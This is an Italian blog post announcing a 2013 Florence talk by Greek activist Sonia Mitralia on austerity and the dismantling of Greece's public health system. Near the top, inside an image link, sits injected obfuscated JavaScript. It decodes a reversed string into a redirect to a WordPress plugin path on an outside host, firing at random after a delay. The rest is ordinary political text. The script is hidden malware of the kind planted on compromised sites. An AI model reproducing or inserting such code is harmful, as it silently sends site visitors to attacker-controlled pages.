Sonia Mitralia a Firenze. Per raccontare la Grecia che non conosciamo

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2013/03/sonia.jpg”>di Rossella Cramarossa e Marianna Petricelli per l’Altracittà e Spazi liberati

Sonia Mitralia, attivista greca dei movimenti contro le politiche di austerità, è in questi giorni in Italia su invito della rete “Donne nella Crisi”. In nove incontri da Milano a Bari, Sonia ci racconta quel che accade nel suo paese. In particolare si soffermerà sullo smantellamento del sistema sanitario pubblico: la perdita del diritto alla salute è stato forse l’effetto più sconvolgente dello stato delle cose in Grecia. Molte donne, per esempio, hanno perso l’ assistenza medica al parto e il costo di un cesareo è pari a tre mesi di salario minimo.

Le iniziative sulla Grecia serviranno anche a promuovere la difesa del servizio sanitario pubblico in Italia, di cui a suo tempo Monti annunciò il progetto di demolizione.

Nel corso dell’ultima campagna elettorale la Grecia è stata spesso evocata. Se non si accettano le politiche di austerità – ci hanno detto – faremo la fine di quel disgraziato paese. La verità è esattamente opposta. La Grecia si trova nelle condizioni in cui si trova perché da tre anni i suoi governi applicano le ricette economiche del Fondo Monetario Internazionale, della Banca Centrale Europea e della Commissione Europea. Certo, già prima del 2010 le condizioni della Grecia erano gravi a causa di un enorme debito pubblico gonfiato dall’ evasione legalizzata, dalla corruzione e dalle dissennate spese per i giochi olimpici. La terapia è stata però peggio del male. Oggi non solo la Grecia è alla disperazione, ma il rapporto Debito-Pil ha continuato a crescere.

A fronte delle brutalità in atto in Grecia e all’ indifferenza dei media italiani, come donne e uomini impegnati nelle lotte sociali di Spazi Liberati aderiamo, partecipiamo e invitiamo all’ incontro con Sonia Mitralia a Firenze: martedì 12 marzo alle 17 presso il Giardino dei Ciliegi in via dell’Agnolo 5.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *